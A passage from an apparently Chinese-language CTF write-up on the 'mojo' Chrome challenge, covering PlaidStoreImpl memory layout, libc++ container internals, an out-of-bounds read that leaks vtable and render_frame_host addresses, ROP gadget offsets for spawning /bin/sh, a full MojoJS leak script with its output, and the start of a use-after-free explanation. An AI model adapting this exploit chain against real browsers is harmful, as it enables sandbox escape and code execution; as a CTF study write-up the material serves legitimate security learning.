function_">success</span>(<span class="title function_">dec2hex</span>(<span class="title function_">bytes2DWORD</span>(res.<span class="property">data</span>.<span class="title function_">slice</span>(<span class="number">0x10</span>, <span class="number">0x18</span>))));</span></span><br><span class="line"><span class="language-javascript">        &#125;)</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="title function_">oob</span>();</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure></li><li><p>启动调试器后，先在<code>PlaidStoreImpl::Create</code>函数上下个断点</p><p><img src="/2020/10/mojo/breakCreate.png" alt="img"></p><p>之后执行<code>run</code>，断在<code>PlaidStoreImpl::Create</code>函数内部。在这里我们可以注意到，<code>PlaidStoreImpl</code>的大小为0x28bytes。</p><p><img src="/2020/10/mojo/sizeofPlaidStore.png" alt="img"></p><blockquote><p>为什么<code>sizeof(PlaidStoreImpl) == 0x28</code>呢？因为下一个要执行的函数是<code>operator new</code>。而这个<code>0x28</code>正是传入的内存大小。</p><p>如何知道那个<code>0x555xxxxx</code>函数是<code>operator new</code>呢？先单步跟踪进去，然后一个<code>frame</code>指令，或者将函数调用链打印出来的<code>bt</code>指令。第一个函数就是。</p><p><img src="/2020/10/mojo/operatorNew.png" alt="img"></p><p>再一个简单的方法就是使用<code>c++filt</code>命令，将<code>name mangling</code>后的函数名称还原回先前的函数名称。</p><p><img src="/2020/10/mojo/cppfilt.png" alt="img"></p></blockquote><p>同时，当<code>operator new</code>函数执行完成后，返回的<code>%rax</code>地址即为<code>PlaidStoreImpl</code>的地址。使用<code>set $ps_addr = $rax</code> gdb命令将该地址存储到gdb的临时变量中。之后直接执行<code>finish</code>命令，跳过该函数剩余的构造<code>PlaidStoreImpl</code>实例的过程（该过程包括但不限于<strong>设置虚表地址等</strong>）。</p><p><img src="/2020/10/mojo/storePsAddr.png" alt="img"></p></li><li><p><code>fini</code>命令之后，我们先看一下<code>PlaidStoreImpl</code>实例的内存布局（相关成员均标注在图片上）</p><p><img src="/2020/10/mojo/plaidStoreImplMap.png" alt="img"></p><blockquote><p>C++的编译器保证虚函数表的指针存在于对象实例中<strong>最前面</strong>的位置。</p></blockquote></li><li><p>我们看一下<code>map</code>的相关内存结构，看看到底泄露的是什么地址 - <a href="https://source.chromium.org/chromium/chromium/src/+/master:buildtools/third_party/libc++/trunk/include/map;l=898;drc=ce29422a5a0922393f61efe899ec80e9894e09ed;bpv=0;bpt=1">chrome std::map 源码</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">_LIBCPP_TEMPLATE_VIS</span> map</span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">typedef</span> __tree&lt;__value_type, __vc, __allocator_type&gt;   __base;</span><br><span class="line">    __base __tree_;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>众所周知，map内部使用<code>rb_tree</code>，因此我们继续点进去看看 - <a href="https://source.chromium.org/chromium/chromium/src/+/master:buildtools/third_party/libc++/trunk/include/__tree;drc=ce29422a5a0922393f61efe899ec80e9894e09ed;bpv=0;bpt=1;l=979">chrome std::tree 源码</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span class="title class_">_Tp</span>, <span class="keyword">class</span> <span class="title class_">_Compare</span>, <span class="keyword">class</span> <span class="title class_">_Allocator</span>&gt;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">__tree</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="keyword">typedef</span> _Tp                                      value_type;</span><br><span class="line">    <span class="keyword">typedef</span> _Compare                                 value_compare;</span><br><span class="line">    <span class="keyword">typedef</span> _Allocator                               allocator_type;</span><br><span class="line"></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    <span class="keyword">typedef</span> allocator_traits&lt;allocator_type&gt;         __alloc_traits;</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">typename</span> __make_tree_node_types&lt;value_type,</span><br><span class="line">        <span class="keyword">typename</span> __alloc_traits::void_pointer&gt;::type</span><br><span class="line">                                                    _NodeTypes;</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">typename</span> _NodeTypes::__parent_pointer      __parent_pointer;</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">typename</span> _NodeTypes::__iter_pointer        __iter_pointer;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    __iter_pointer                                     __begin_node_;</span><br><span class="line">    __compressed_pair&lt;<span class="type">__end_node_t</span>, __node_allocator&gt;  __pair1_;</span><br><span class="line">    __compressed_pair&lt;size_type, value_compare&gt;        __pair3_;</span><br><span class="line">    <span class="comment">// ...</span></span><br></pre></td></tr></table></figure><p>可以看到，该tree有三个成员变量，而第一个pointer指向的是根结点。tree成员变量的数量也与我们<code>PlaidStoreImpl</code>内存布局所对应。</p></li><li><p>我们再看看tree第一个pointer所指向的<strong>叶结点的成员变量</strong>有哪些 - <a href="https://source.chromium.org/chromium/chromium/src/+/master:buildtools/third_party/libc++/trunk/include/__tree;drc=ce29422a5a0922393f61efe899ec80e9894e09ed;l=751">chrome tree_node 源码</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span class="title class_">_Pointer</span>&gt;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">__tree_end_node</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="keyword">typedef</span> _Pointer pointer;</span><br><span class="line">    pointer __left_;</span><br><span class="line">  <span class="comment">// ....</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span class="title class_">_VoidPtr</span>&gt;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">__tree_node_base</span></span><br><span class="line">    : <span class="keyword">public</span> __tree_node_base_types&lt;_VoidPtr&gt;::__end_node_type</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">typename</span> _NodeBaseTypes::__node_base_pointer pointer;</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">typename</span> _NodeBaseTypes::__parent_pointer __parent_pointer;</span><br><span class="line"></span><br><span class="line">    pointer          __right_;</span><br><span class="line">    __parent_pointer __parent_;</span><br><span class="line">    <span class="type">bool</span> __is_black_;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">   <span class="comment">// ...</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span class="title class_">_Tp</span>, <span class="keyword">class</span> <span class="title class_">_VoidPtr</span>&gt;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">__tree_node</span></span><br><span class="line">    : <span class="keyword">public</span> __tree_node_base&lt;_VoidPtr&gt;</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="keyword">typedef</span> _Tp __node_value_type;</span><br><span class="line">    __node_value_type __value_;</span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>即，一个<code>__tree_node</code>实例有以下五个成员，分别是</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">pointer             __left_;</span><br><span class="line">pointer             __right_;</span><br><span class="line">__parent_pointer    __parent_;</span><br><span class="line"><span class="type">bool</span>                __is_black_;</span><br><span class="line">__node_value_type   __value_;   <span class="comment">// `__node_value_type`在这里是`pair&lt;string, vector&lt;uint8_t&gt;&gt;`</span></span><br></pre></td></tr></table></figure><p>最后，我们查看一下<code>__tree_node</code>内存布局</p><blockquote><p>在查看内存布局前，先令chrome执行完<code>PlaidStoreImpl::storeData</code>函数，将数据存入tree，方便调试。</p></blockquote><p><img src="/2020/10/mojo/treeNodeMap.png" alt="img"></p><blockquote><p>图中红色框的0x30字节为<code>__value__</code>成员变量。其中，前0x18个字节是<code>string</code>类实例（注意那个<code>0x0000000061616161</code>，这正是填入的keyString<code>1111</code>），后0x18字节是<code>vector</code>类实例。</p></blockquote></li><li><p>而<code>vector</code>成员变量如下，该类共有三个成员，这里我们只关心<code>__begin_</code>成员所指向的内存。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span class="title class_">_Allocator</span>&gt;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">_LIBCPP_TEMPLATE_VIS</span> vector&lt;<span class="type">bool</span>, _Allocator&gt;</span><br><span class="line">    : <span class="keyword">private</span> __vector_base_common&lt;<span class="literal">true</span>&gt;</span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    __storage_pointer                                      __begin_;</span><br><span class="line">    size_type                                              __size_;</span><br><span class="line">    __compressed_pair&lt;size_type, __storage_allocator&gt; __cap_alloc_;</span><br><span class="line">  <span class="comment">// ...</span></span><br></pre></td></tr></table></figure><p>以下是该vector所指向的内存位置，可以看到前0x10个字节的值是先前执行<code>PlaidStore::storeData</code>函数时写入的。而我们可以通过该<code>vector</code>越界向后读取。</p><p><img src="/2020/10/mojo/vectorMap.png" alt="img"></p></li></ul><blockquote><p>为什么要这么大动干戈，从上向下查找<code>vector</code>的泄露地址呢？因为我们需要寻找一下，<strong>这个地址是否与其他已经获得的地址之间存在关系</strong>。</p><p>在这题中，我们可以确认<code>vecotr __begin_</code>与<code>PlaidStoreImpl</code>地址位于同一个段。</p></blockquote><ul><li><p>那么，该越界读取什么来泄露信息，泄露什么信息呢？</p><p>由于<code>PlaidStore</code>实例与<code>vector __begin_</code>所指向的地址<strong>位于同一个段</strong>。同时，<code>PlaidStore</code>实例中存在虚表，因此我们可以通过<code>vector</code>来越界读取<code>PlaidStore vtable</code>地址。这样就可以通过虚表地址确定一系列的地址（包括但不限于确定ELF基地址等）。</p><blockquote><p>类实例的虚表位于<code>rodata</code>段中，也就是说，<code>vtable</code>地址与<strong>ELF基地址</strong>的相对偏移是保持不变的。</p></blockquote><p><img src="/2020/10/mojo/vmmap.png" alt="img"></p><p>我们需要大量分配<code>PlaidStoreImpl</code>与<code>vector</code>，使它们呈线性交替存放，之后就可以通过越界读来<strong>获取虚表地址</strong>。</p><blockquote><p>注意虚表地址中的后三个十六进制数<code>0x7a0</code>，我们将通过这个来识别读取到的数据是否是虚表地址，而不是采用相对偏移的方式来读取，这样就可以最大程度上避免<strong>由于内存分配器的不同而导致的偏移差异</strong>。</p></blockquote><p>而虚表与chrome基地址的偏移为<code>0x000055555f50a7a0 - 0x555555554000 == 0x9fb67a0</code>，获取虚表地址后就可以通过相对偏移来计算出ELF基地址。</p><p><img src="/2020/10/mojo/chromeBaseOffset.png" alt="img"></p><p>ELF基地址有了之后，我们就可以以下命令来获取一系列<code>gadgets</code>地址。</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary ./chrome &gt; gadgets.txt</span><br></pre></td></tr></table></figure><blockquote><p>由于chrome文件过大，执行该命令时需要<strong>4GB内存</strong>左右</p><p>建立出的<code>gadgets.txt</code>的文件大小将近<strong>400MB</strong>。</p></blockquote><p>这样就可以获取到以下gadget的相对偏移</p><blockquote><p>这些gadgets组合在一起便可<strong>劫持栈</strong>，并利用<code>syscall</code>执行<code>/bin/sh</code></p></blockquote><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x000000000880dee8</span> : <span class="keyword">xchg</span> <span class="built_in">rax</span>, <span class="built_in">rsp</span> <span class="comment">; clc ; pop rbp ; ret</span></span><br><span class="line"><span class="number">0x0000000002e4630f</span> : <span class="keyword">pop</span> <span class="built_in">rdi</span> <span class="comment">; ret</span></span><br><span class="line"><span class="number">0x0000000002d278d2</span> : <span class="keyword">pop</span> <span class="built_in">rsi</span> <span class="comment">; ret</span></span><br><span class="line"><span class="number">0x0000000002e9998e</span> : <span class="keyword">pop</span> <span class="built_in">rdx</span> <span class="comment">; ret</span></span><br><span class="line"><span class="number">0x0000000002e651dd</span> : <span class="keyword">pop</span> <span class="built_in">rax</span> <span class="comment">; ret</span></span><br><span class="line"><span class="number">0x0000000002ef528d</span> : <span class="keyword">syscall</span></span><br></pre></td></tr></table></figure></li><li><p>所以最终，我们编写以下代码来泄露我们的目标地址</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 调用MojoJS接口时一定要将这些js包含入html中 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">dec2hex</span>(<span class="params">dec</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + dec.<span class="title function_">toString</span>(<span class="number">16</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">bytes2DWORD</span>(<span class="params">bytes</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> value = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">8</span>; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">            value = value * <span class="number">0x100</span> + bytes[<span class="number">7</span> - i];</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> value;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">success</span>(<span class="params">msg</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[+] &#x27;</span> + msg);</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">document</span>.<span class="property">body</span>.<span class="property">innerText</span> += <span class="string">&#x27;[+] &#x27;</span> + msg + <span class="string">&#x27;\n&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">pwn</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> try_size = <span class="number">100</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> plaidStorePtrList = [];</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; try_size; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> plaidStorePtr = <span class="keyword">new</span> blink.<span class="property">mojom</span>.<span class="title class_">PlaidStorePtr</span>();</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">            <span class="title class_">Mojo</span>.<span class="title function_">bindInterface</span>(</span></span><br><span class="line"><span class="language-javascript">                blink.<span class="property">mojom</span>.<span class="property">PlaidStore</span>.<span class="property">name</span>,</span></span><br><span class="line"><span class="language-javascript">                mojo.<span class="title function_">makeRequest</span>(plaidStorePtr).<span class="property">handle</span>,</span></span><br><span class="line"><span class="language-javascript">                <span class="string">&quot;context&quot;</span>,</span></span><br><span class="line"><span class="language-javascript">                <span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">await</span> plaidStorePtr.<span class="title function_">storeData</span>(<span class="string">&quot;aaaa&quot;</span>, <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(<span class="number">0x28</span>).<span class="title function_">fill</span>(<span class="number">0x30</span> + i));</span></span><br><span class="line"><span class="language-javascript">            plaidStorePtrList.<span class="title function_">push</span>(plaidStorePtr);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> <span class="title class_">PlaidStore</span>_vtable_addr = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> render_frame_host_addr = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; try_size; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// 注意这里使用await，保证异步操作。因为promise回调是同步的。</span></span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// 获取返回的promiseValue</span></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">let</span> res = <span class="keyword">await</span> plaidStorePtrList[i].<span class="title function_">getData</span>(<span class="string">&quot;aaaa&quot;</span>, <span class="number">0x100</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">let</span> data = res.<span class="property">data</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">for</span> (<span class="keyword">let</span> j = <span class="number">0x28</span>; j &lt; <span class="number">0x100</span> - <span class="number">0x8</span>; j += <span class="number">0x8</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 尽管返回的是string，但仍然可以直接当作十六进制数字来使用。</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> hex = <span class="title function_">bytes2DWORD</span>(data.<span class="title function_">slice</span>(j, j + <span class="number">0x8</span>));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">if</span> ((hex &amp; <span class="number">0xfff</span>) == <span class="number">0x7a0</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">                    <span class="title class_">PlaidStore</span>_vtable_addr = <span class="title function_">dec2hex</span>(hex);</span></span><br><span class="line"><span class="language-javascript">                    render_frame_host_addr = <span class="title function_">dec2hex</span>(<span class="title function_">bytes2DWORD</span>(data.<span class="title function_">slice</span>(j + <span class="number">0x8</span>, j + <span class="number">0x10</span>)));</span></span><br><span class="line"><span class="language-javascript">                    <span class="title function_">success</span>(<span class="string">&quot;PlaidStore vtable: &quot;</span> + <span class="title class_">PlaidStore</span>_vtable_addr);</span></span><br><span class="line"><span class="language-javascript">                    <span class="title function_">success</span>(<span class="string">&quot;render_frame_host: &quot;</span> + render_frame_host_addr);</span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">break</span>;</span></span><br><span class="line"><span class="language-javascript">                &#125;</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">if</span> (<span class="title class_">PlaidStore</span>_vtable_addr != <span class="number">0</span>)</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">break</span>;</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span> (<span class="title class_">PlaidStore</span>_vtable_addr == <span class="number">0</span>)</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">throw</span> <span class="string">&quot;PlaidStore vtable addr leak failed!&quot;</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> chromeTextBase = <span class="title class_">PlaidStore</span>_vtable_addr - <span class="number">0x9fb67a0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;chrome Text Base: &quot;</span> + <span class="title function_">dec2hex</span>(chromeTextBase));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> xchg_addr = chromeTextBase + <span class="number">0x000000000880dee8</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;xchg_addr: &quot;</span> + <span class="title function_">dec2hex</span>(xchg_addr));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> pop_rdi_ret = chromeTextBase + <span class="number">0x0000000002e4630f</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;pop_rdi_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rdi_ret));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> pop_rsi_ret = chromeTextBase + <span class="number">0x0000000002d278d2</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;pop_rsi_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rsi_ret));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> pop_rdx_ret = chromeTextBase + <span class="number">0x0000000002e9998e</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;pop_rdx_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rdx_ret));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> pop_rax_ret = chromeTextBase + <span class="number">0x0000000002e651dd</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;pop_rax_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rax_ret));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> syscall_addr = chromeTextBase + <span class="number">0x0000000002ef528d</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;syscall_addr: &quot;</span> + <span class="title function_">dec2hex</span>(syscall_addr));</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="title function_">pwn</span>();</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><p>泄露出的地址为</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[+] <span class="title class_">PlaidStore</span> <span class="attr">vtable</span>: <span class="number">0x557731d667a0</span></span><br><span class="line">[+] <span class="attr">render_frame_host</span>: <span class="number">0x2fde7ced7000</span></span><br><span class="line">[+] chrome <span class="title class_">Text</span> <span class="title class_">Base</span>: <span class="number">0x557727db0000</span></span><br><span class="line">[+] <span class="attr">xchg_addr</span>: <span class="number">0x5577305bdee8</span></span><br><span class="line">[+] <span class="attr">pop_rdi_ret</span>: <span class="number">0x55772abf630f</span></span><br><span class="line">[+] <span class="attr">pop_rsi_ret</span>: <span class="number">0x55772aad78d2</span></span><br><span class="line">[+] <span class="attr">pop_rdx_ret</span>: <span class="number">0x55772ac4998e</span></span><br><span class="line">[+] <span class="attr">pop_rax_ret</span>: <span class="number">0x55772ac151dd</span></span><br><span class="line">[+] <span class="attr">syscall_addr</span>: <span class="number">0x55772aca528d</span></span><br></pre></td></tr></table></figure></li></ul><h3 id="b-UAF">b. UAF</h3><ul><li><p>由于<code>render_frame_host_</code>的UAF，<code>render_frame_host_</code>指针所指向的<code>RenderFrameHostImpl</code>内存位置是<strong>完全可控</strong>的（因为这块内存可以先被free，后被我们allocate）。</p><p>同时，我们可以利用先前找到的<code>xchg rax, rsp</code>，将<code>$rax</code>值和<code>$rsp</code>值交换，这样就可以<strong>劫持栈</strong>，之后执行我们的<code>gadgets</code>。</p><p>那<code>$rax</code>值应该怎么控制呢？请向下翻页查看下图，当执行虚函数时，<code>%rax</code>值正好为<code>render_frame_host_</code>的虚表地址<code>vtable entry</code>，因此我们还是可以通过控制<code>RenderFrameHostImpl</code>内存区域来设置<code>%rax</code>的值。这里我们设置该<code>vtable entry</code>为<code>render_frame_host_ + 0x10</code>，即，<code>render_frame_host_[0] = render_frame_host_ + 0x10</code>（这段话有点绕，请仔细思考）</p><p>因此，我们完全可以在<code>render_frame_host_</code>指针所指向的内存区域上布置我们的<code>gadgets</code>。</p></li><li><p>但在此之前，我们需要获取一下<code>render_frame_host_</code>所使用的某个虚函数在虚表的相对偏移。这里我们选择获取<code>IsRenderFrameLive</code>虚函数的偏移。</p><p>我们在<code>PlaidStoreImpl::GetData</code>函数下断，单步跟踪几步即可显示该函数的偏移。如图所示，<code>IsRenderFrameLive</code>函数在虚表中的相对偏移为<code>0x160</code>。</p><p><img 